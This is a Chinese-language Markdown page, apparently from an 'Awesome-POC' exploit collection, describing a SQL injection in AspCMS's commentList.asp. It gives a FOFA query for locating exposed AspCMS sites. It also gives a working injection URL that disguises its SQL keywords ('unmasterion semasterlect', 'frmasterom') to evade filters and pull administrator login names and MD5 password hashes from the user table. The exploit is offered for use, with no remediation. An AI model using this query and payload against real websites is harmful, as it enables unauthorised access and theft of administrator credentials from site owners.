Awesome-POC/CMS漏洞/AspCMS commentList.asp SQL注入漏洞.md
2022-12-05 11:09:28 +08:00

33 lines
577 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# AspCMS commentList.asp SQL注入漏洞
## 漏洞描述
AspCMS commentList.asp 存在SQL注入漏洞攻击者通过漏洞可以获取管理员md5的密码
## 漏洞影响
```
AspCMS
```
## FOFA
```
app="ASPCMS"
```
## 漏洞复现
通过网站源码响应判断CMS
![img](./images/202202170904613.png)
验证POC
```php
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
```
![img](./images/202202170904678.png)
成功获取管理员账号以及密码的MD5